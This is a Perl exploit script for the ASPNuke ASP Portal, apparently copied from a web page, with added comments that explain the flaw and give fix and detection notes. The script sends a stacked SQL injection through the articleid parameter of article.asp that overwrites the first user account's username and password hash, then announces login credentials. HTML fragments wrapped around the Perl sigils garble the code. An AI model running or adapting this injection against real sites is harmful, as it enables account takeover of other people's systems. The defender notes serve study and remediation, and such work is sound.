#!/usr/bin/perl
######################################################################################
# T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m
######################################################################################
# EXPLOIT FOR: ASPNuke ASP Portal
#
# Expl0it By: mh_p0rtal@Yahoo.com
#
# Discovered By: Trap-Set Underground Hacking Team (oil_KarchacK)
#
######################################################################################
# GR33tz T0 ==> Alpha_programmer -- oil_Karchack -- the_CephaleX -- Str0ke
# And Iranian Security & Technical Sites:
# IHS TeaM , alphaST , Shabgard Security Team , Emperor Hacking Team ,
# Crouz Security Team , Hat-squad security team & Simorgh-ev Security Team
######################################################################################
use IO::Socket;
# Proof-of-concept for a SQL injection in ASPNuke's /module/article/article/article.asp.
# The articleid query parameter is placed into a SQL statement without validation or
# parameterisation, so a stacked statement (";%20update%20tbluser ...") after the id
# is executed by the database and rewrites the row with userID=1 in tbluser.
#
# Defender notes:
#   - Root cause / fix: bind articleid as a parameter (or reject anything that is not
#     an integer before it reaches the query) and run the site's DB account without
#     write access to tbluser.
#   - Detection: web-server logs with requests to article.asp whose articleid contains
#     a statement separator followed by SQL keywords (here ";%20update%20tbluser").
#   - Impact shown by this script: an attacker-chosen username and password hash
#     replace the first user account.
#
# Reading notes on this listing:
#   - The "<a href=...>$</a>" fragments wrapped around every "$" sigil below are HTML
#     left over from the web page the script was copied from, not Perl.
#   - No "use strict" / "use warnings": $addr is an undeclared package global.
#
# Usage banner: the script takes exactly one argument, the target hostname.
if (@ARGV < 1)
{
print "/n==========================================/n";
print " /n -- Exploit By mh_p0rtal --/n/n";
print " Trap-Set Underground Hacking Team /n/n";
print " Usage:ASPNuke.pl <T4rg3t> /n/n";
print "==========================================/n/n";
print "Examples:/n/n";
print " ASPNuke.pl [url]www.Site.com[/url] /n";
exit();
}
# Target host is taken verbatim from the command line and used both as the TCP peer
# and in the HTTP Host header.
my <a href="#" target="_blank">$</a>host = <a href="#" target="_blank">$</a>ARGV[0];
# Plain TCP connection to port 80; no TLS, no timeout, no proxy support.
my <a href="#" target="_blank">$</a>remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => <a href="#" target="_blank">$</a>host,
PeerPort => "80" );
unless (<a href="#" target="_blank">$</a>remote) { die "C4nn0t C0nn3ct to <a href="#" target="_blank">$</a>host" }
print "[+]C0nn3cted/n";
# The single HTTP/1.0 request. The injected UPDATE sets a precomputed 64-hex-character
# password hash and the username 'trapset' on userID=1 (presumably the stored form of
# the password 'trapset' that the final message announces; the script does not say
# which hash function ASPNuke uses). The trailing "--" comments out the rest of the
# original query.
<a href="#" target="_blank">$</a>addr = "GET /module/article/article/article.asp?articleid=1%20;%20update%20tbluser%20SET%20password='bf16c7ec063e8f1b62bf4ca831485ba0da56328f818763ed34c72ca96533802c'%20,%20username='trapset'%20where%20userID=1%20-- HTTP/1.0/n";
<a href="#" target="_blank">$</a>addr .= "Host: <a href="#" target="_blank">$</a>host/n/n/n/n";
print "/n";
# Send the request. Nothing is ever read back from $remote, so the script cannot tell
# whether the server accepted the request or whether the UPDATE ran; the messages
# below are printed unconditionally after a fixed delay. The socket is never closed
# explicitly either.
print <a href="#" target="_blank">$</a>remote <a href="#" target="_blank">$</a>addr;
print "[+]Wait...";
sleep(5);
print "Wait For Changing Password .../n";
print "[+]OK , Now Login With : /n";
print "Username: trapset/n";
print "Password: trapset/n/n";
说明：这是一个 Perl 小脚本。可以看出，程序对 article.asp 中的 articleid 没有做过滤。